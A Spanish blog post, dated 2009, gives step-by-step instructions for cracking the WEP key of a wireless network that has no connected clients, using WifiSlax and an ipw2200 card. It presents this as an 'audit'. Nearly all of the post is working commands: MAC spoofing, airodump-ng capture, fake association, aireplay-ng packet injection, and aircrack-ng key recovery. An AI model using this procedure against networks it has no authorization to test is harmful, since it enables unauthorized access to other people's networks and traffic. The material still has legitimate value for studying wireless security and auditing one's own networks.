Archive

Posts Tagged ‘Wifi Audit Linux’

Auditoria ipw2200+injection Sin Clientes Método 1 WifiSlax-3.1

diciembre 17, 2009 Deja un comentario

RECOPILANDO INFORMACIÓN:

Mi interfaz wifi es eth1.

Vamos a wifislax-> asistencia chipset -> asistencia intel pro wireless -> recargar modulo ipw2200

Con esto nos sale una nueva interfaz rtap0.

Configuramos las interfaces eth1 y rtap0:

ifconfig eth1 up

ifconfig rtap0 up

ifconfig eth1 hw ether 00:11:22:33:44:55

Sabiendo esto ejecutamos:

airodump-ng -w captura rtap0

Anotamos el essid de la red a auditar, su bssid, el ch y relanzamos el comando para que sólo capture en esa red.

En mi caso la información que necesito es:

-interfaz wifi: eth1

-nueva interfaz wifi para inyectar: rtap0

– essid: WLAN_80

-bssid: 00:55:44:33:22:11

-mimac: 00:11:22:33:44:55

Borramos los ficheros captura* creados y relanzamos airodump-ng:

airodump-ng -c 6 -w captura –bssid 00:55:44:33:22:11 rtap0

Hacemos una asociación falsa a la red:

iwconfig eth1 essid WLAN_80 channel 6 key 6666666666666

Y ahora inyectamos:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF -b 00:55:44:33:22:11 -h 00:11:22:33:44:55 eth1 -i rtap0

-b: bssid de la red

-h: mi mac

Esperamos a que capture algún paquete, puede tardar algunos minutos. En cuanto llegue alguno teclamos “y”  “enter”.

Empezará a inyectar, y en la shell anterior dónde tenemos corriendo el airodump-ng el valor “Data” empezará a incrementarse.

Esperamos a que alcance un valor entre 20000-30000 y ejecutamos el aircrack-ng:

aircrack-ng -z captura-2.cap

-z: le damos el fichero de captura que llamamos captura con extensión cap más grande, en mi caso sería captura-2.cap.

En unos minutos nos la clave en formato hexadecimal y ascii.

Categorías:SysAdmin Etiquetas: